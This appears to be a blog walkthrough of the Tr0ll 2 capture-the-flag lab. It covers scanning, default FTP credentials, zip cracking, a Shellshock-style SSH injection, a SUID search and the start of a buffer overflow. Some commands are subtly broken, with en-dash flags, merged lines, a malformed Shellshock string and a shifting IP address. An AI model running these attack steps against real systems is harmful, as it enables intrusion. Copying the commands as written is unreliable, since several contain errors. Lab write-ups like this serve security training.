Introduction
In this post, You will learn how to get root in Tr0ll 2, and also we will see how to CTF the flag, Let’s begin.
To download Troll2 [Click here]
Tr0ll2 Hacking phases
- Finding target IP
- Nmap scan
- Viewing target site
- Curl Home page
- Dirb
- Download robots.txt
- Enumerating cat_the_troll
- Decoding base 64
- FTP login for Zip file
- Cracking zip file (Fcrackzip)
- Elevating access
- buffer overflow
- Debug using GDB
Advertisement
Hack tr0ll 2
Finding target IP
To find the target IP, just enter arp-scan -l or enter the nediscover command.
sudo arp-scan -l
![](http://techyrick.com/wp-content/uploads/2022/03/arp-scan-tr-1024x342.webp)
Nmap scan
I am doing the -A scan, -A stands for OS and service scan.
nmap -A 192.168.1.2
![](http://techyrick.com/wp-content/uploads/2022/03/nmap-tr-1024x459.webp)
From the nmap scan we can see the port 21(FTP), 22(tcp), 80(tcp) are open.
Viewing target site
I wanted to take a look at the site so, I just pasted the target IP in the browser. The result looked the same as the Tr0ll 1 but this time phrases changed.
http://192.168.1.2
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-22_54_53-192.168.1.2-Opera.webp)
I found something wrong in the site so, I did curl and the site.
Curl Home page
curl 192.168.1.2
![](http://techyrick.com/wp-content/uploads/2022/03/curl-tr.webp)
Trolled again ????
Dirb
dirb http://192.168.1.2 rockyou.txt
![](http://techyrick.com/wp-content/uploads/2022/03/dirb-tr.webp)
Found robots.txt
View robots.txt
Found a bunch of usernames
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-23_03_45-Hack-the-Tr0ll-2-Boot2Root-Challenge-Hacking-Articles-Opera.png)
Download robots.txt
wget http://192.168.1.2/robots.txt nano robots.txt
![](http://techyrick.com/wp-content/uploads/2022/03/wget-tr-1024x197.webp)
Doing dirb scan using the robots.txt file
dirb http://192.168.1.2/ robots.txt
![](http://techyrick.com/wp-content/uploads/2022/03/2nd-dirb.webp)
Found 4 url, and I am moving to the 4th one that is /ok_this_is_it
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-23_17_49-192.168.1.2_ok_this_is_it_-Opera.webp)
I wanted to view the page source
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-23_19_13-view-source_192.168.1.2_ok_this_is_it_-Opera.webp)
Enumerating cat_the_troll
Downloading the image we have seen
wget http://192.168.1.131/dont_bother/cat_the_troll.jpg
![](http://techyrick.com/wp-content/uploads/2022/03/wget2-tr-1024x183.webp)
tail –n 3 cat_the_troll.jpg
Viewing last three lines
![](http://techyrick.com/wp-content/uploads/2022/03/tail-1024x158.webp)
It says look deep in y0ur_self
So, I wanted to go to that link too…
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-23_27_07-Index-of-_y0ur_self-Opera.webp)
Doing wget again to get the answer.txt file
wget http://192.168.1.2/y0ur_self/answer.txt
![](http://techyrick.com/wp-content/uploads/2022/03/answer-1024x183.webp)
The answer.txt seems to be base 64 so let’s decode it
Decoding base 64
To decode the file, just enter the below command
base64 -d answer.txt>decoded.txt
After decoding, I have found a bunch of usernames in decoded.txt
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-21_52_35-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.webp)
FTP login for Zip file
ftp 192.168.1.131 ls get lmao.zip
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-21_56_31-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl-1024x388.webp)
Username: Tr0ll
Password: Tr0ll
When getting connected to FTP we can see the first line Tr0ll as username and I guessed that should be the password. If you have played Tr0ll: 1 You know why I am saying.
We have found lmao.zip so just downloaded it.
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-21_57_01-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl-1024x689.webp)
Cracking zip file (Fcrackzip)
fcrackzip –u –D –p decoded.txt lmao.zip unzip lmao.zip
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-21_58_26-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.webp)
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-21_59_25-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.webp)
Doing cat noob to view the file
cat noob
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-22_00_04-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.webp)
chmod 600 noob ssh –i noob noob@192.168.1.131 '() ( : ;}; /bin/bash' id
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-22_16_26-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl-1.webp)
Elevating access
python –c "import pty;pty.spawn('/bin/bash');" find / -perm -4000 2>/dev/null
Move to nothing_to_see_here/choose_wisely
And then execute ./r00t
![](http://techyrick.com/wp-content/uploads/2022/03/2022-03-02-22_31_04-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.webp)
buffer overflow
./pattern_create.rb -l 500
![](http://techyrick.com/wp-content/uploads/2022/03/082018_2009_VulnhubMach27-1.jpg)
Debug using GDB
![](http://techyrick.com/wp-content/uploads/2022/03/082018_2009_VulnhubMach28.webp)
Checking the position of the identified value using pattern_offset shows that the position is located at 268.
![](http://techyrick.com/wp-content/uploads/2022/03/082018_2009_VulnhubMach29.webp)
![](http://techyrick.com/wp-content/uploads/2022/03/082018_2009_VulnhubMach32.jpg)